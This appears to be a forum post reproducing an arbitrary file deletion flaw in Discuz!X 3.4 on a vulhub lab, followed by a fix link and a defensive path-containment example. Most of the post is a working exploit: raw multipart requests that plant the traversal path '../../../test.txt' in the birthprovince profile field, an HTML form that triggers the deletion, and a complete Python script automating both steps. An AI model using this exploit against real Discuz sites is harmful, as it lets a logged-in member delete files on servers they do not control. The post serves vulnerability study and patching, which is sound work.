Views: 293 | Replies: 0

Discuz!X 3.4 arbitrary file deletion vulnerability: reproduction

Posted on 2022-6-25 08:59:09 by the forum administrator

Preface: On September 29, Discuz fixed a front-end (member-side) arbitrary file deletion vulnerability. A similar vulnerability had been submitted to WooYun and to Discuz in 2014, but the incomplete fix led to this one. Many posts online say the official 3.4 version is already fixed, but the environment I used is the 3.4 version from vulhub, so without knowing whether 3.4 is fixed or not, I just reproduced it directly.
Affected versions: Discuz <= 3.4
Environment: the Discuz!X 3.4 image from vulhub
Reproduction steps: first create a test.txt file in the discuz directory; this is the file we will delete later.
(Screenshot: creating test.txt)
Visit http://192.168.220.131/home.php?mod=spacecp, open the browser's Inspect Element, find the value of formhash, and copy it.
(Screenshot: the formhash value)
Use Burp to capture the request and obtain the cookie.
(Screenshot: the captured cookie)
Send the following request, replacing the cookie, the formhash, and the file to delete (formhash is Discuz's per-session CSRF token, so it must come from the same logged-in session as the cookie):
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: localhost
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Connection: close

------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"

84a7f376
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"

../../../test.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"

1
------WebKitFormBoundaryPFvXyxL45f34L12s--
(Screenshot: sending the request)
Refresh the page; the birthplace field now shows the state in the figure below:
(Screenshot: data written successfully)

This shows the path has been stored in the database.
Next, create an upload.html with the following code; change the IP to your Discuz host and the formhash value to your own formhash:
<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="84a7f376" />
<input type="text" name="profilesubmit" value="1" />
<input type="submit" value="Submit" />
</form>
Open upload.html in the browser that holds the logged-in session, pick any file, and submit.

Or build the request directly:
POST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.1
Host: 192.168.220.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------123821742118716
Content-Length: 91989
Connection: close
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Upgrade-Insecure-Requests: 1

-----------------------------123821742118716
Content-Disposition: form-data; name="birthprovince"; filename="0.jpg"
Content-Type: image/jpeg

zerba (anything can go here)
-----------------------------123821742118716--

Go back to the discuz directory and check: test.txt has been deleted.
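The two requests above can be scripted. The following Python script is an added example (not code from the post, from vulhub, or from Discuz) that builds and sends the same two multipart requests: the first stores the traversal string in the birthprovince profile field, the second uploads a throwaway file part for birthprovince with deletefile[birthprovince] in the query string, as in the upload.html form. It assumes you supply the lab's base URL, a logged-in member's Cookie header and that member's formhash (copied from Burp as the post shows); the boundary string, argument names and the relative path argument are the script's own. The path is relative to the directory the profile handler unlinks from; in the post, ../../../test.txt reaches the Discuz root.

```python
"""Scripted reproduction of the two-step profile 'deletefile' flow described
in the post.  Added example; not the post's, vulhub's or Discuz's code."""
import sys
import urllib.parse
import urllib.request

BOUNDARY = "----ExampleBoundary7MA4YWxkTrZu0gW"  # constructed boundary value


def build_multipart(fields, boundary=BOUNDARY):
    """Encode fields as multipart/form-data.

    A value is either a plain string or a (filename, content_type, data)
    tuple for a file part.  Returns (content_type_header, body_bytes)."""
    lines = []
    for name, value in fields.items():
        lines.append(f"--{boundary}")
        if isinstance(value, tuple):
            filename, ctype, data = value
            lines.append(f'Content-Disposition: form-data; name="{name}"; filename="{filename}"')
            lines.append(f"Content-Type: {ctype}")
            lines.append("")
            lines.append(data)
        else:
            lines.append(f'Content-Disposition: form-data; name="{name}"')
            lines.append("")
            lines.append(value)
    lines.append(f"--{boundary}--")
    lines.append("")
    return f"multipart/form-data; boundary={boundary}", "\r\n".join(lines).encode()


def plant_request(base_url, formhash, relative_path):
    """Step 1 of the post: store the traversal string in birthprovince.
    Returns (url, content_type, body)."""
    url = base_url.rstrip("/") + "/home.php?mod=spacecp&ac=profile&op=base"
    ctype, body = build_multipart({
        "formhash": formhash,
        "birthprovince": relative_path,
        "profilesubmit": "1",
    })
    return url, ctype, body


def trigger_request(base_url, formhash):
    """Step 2 of the post: a file part named birthprovince, with
    deletefile[birthprovince] in the query string as the upload.html form
    does.  The file content is irrelevant, as the post notes."""
    query = urllib.parse.urlencode({
        "mod": "spacecp", "ac": "profile", "op": "base",
        "profilesubmit": "1", "formhash": formhash,
        "deletefile[birthprovince]": "aaaaaa",
    })
    url = base_url.rstrip("/") + "/home.php?" + query
    ctype, body = build_multipart({
        "birthprovince": ("0.jpg", "image/jpeg", "zerba"),
    })
    return url, ctype, body


def send(url, ctype, body, cookie):
    """POST one prepared request with the member's session cookie."""
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", ctype)
    req.add_header("Cookie", cookie)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.getcode()


if __name__ == "__main__":
    if len(sys.argv) != 5:
        sys.exit("usage: discuz_delete.py BASE_URL COOKIE FORMHASH RELATIVE_PATH")
    base, cookie, fh, path = sys.argv[1:]
    print("plant:", send(*plant_request(base, fh, path), cookie))
    print("trigger:", send(*trigger_request(base, fh), cookie))
```

Run it against the lab only, e.g. with BASE_URL http://192.168.220.131, the Cookie header and formhash from Burp, and ../../../test.txt as the path; the second request returns a normal profile-saved page, and test.txt is gone afterwards.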
Fix recommendation: https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574
Edit upload/source/include/spacecp/spacecp_profile.php and remove the unlink-related code.
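The linked commit simply removes the unlink. If an application has to keep a delete path for profile files, the stored value must be confined to the profile attachment directory before unlink runs, which is exactly the check the post's ../../../test.txt defeats. The Python below is an added illustration of that check, not Discuz's PHP and not the commit's change; the data/attachment/profile layout and the allowed filename pattern are assumptions.

```python
"""Containment check before unlinking a stored profile-file path.
Added illustration; not Discuz's code or the linked commit."""
import os
import re
import tempfile

# Assumed naming scheme for files in the profile directory.
ALLOWED_NAME = re.compile(r"^[A-Za-z0-9_]+\.(jpg|jpeg|png|gif)$")


def resolve_profile_file(profile_dir, stored_value):
    """Return the absolute path that may be unlinked, or None.

    Rejects empty values, embedded NULs, absolute paths and any value that,
    once normalised (realpath also follows symlinks), leaves profile_dir."""
    if not stored_value or "\x00" in stored_value:
        return None
    base = os.path.realpath(profile_dir)
    target = os.path.realpath(os.path.join(base, stored_value))
    if target == base or os.path.commonpath([base, target]) != base:
        return None
    if not ALLOWED_NAME.match(os.path.basename(stored_value)):
        return None
    return target


def delete_profile_file(profile_dir, stored_value):
    """Guarded replacement for a bare unlink($dir . $stored_value).
    Returns True only when a confined, existing file was removed."""
    target = resolve_profile_file(profile_dir, stored_value)
    if target is None or not os.path.isfile(target):
        return False
    os.unlink(target)
    return True


def demo():
    """Builds a throwaway tree (constructed sample data) mirroring the post:
    test.txt in the web root, an avatar inside data/attachment/profile."""
    root = tempfile.mkdtemp()
    profile = os.path.join(root, "data", "attachment", "profile")
    os.makedirs(profile)
    victim = os.path.join(root, "test.txt")
    avatar = os.path.join(profile, "abc_avatar.jpg")
    for path in (victim, avatar):
        open(path, "w").close()
    return {
        "traversal_rejected": resolve_profile_file(profile, "../../../test.txt") is None,
        "traversal_not_deleted": (not delete_profile_file(profile, "../../../test.txt")
                                  and os.path.exists(victim)),
        "absolute_rejected": resolve_profile_file(profile, "/etc/passwd") is None,
        "empty_rejected": resolve_profile_file(profile, "") is None,
        "legit_deleted": (delete_profile_file(profile, "abc_avatar.jpg")
                          and not os.path.exists(avatar)),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'ok' if ok else 'FAIL'}")
```

The containment test compares realpath outputs rather than looking for "../" in the string, so encoded or symlink-based variants are caught the same way; the filename pattern is a second, independent gate.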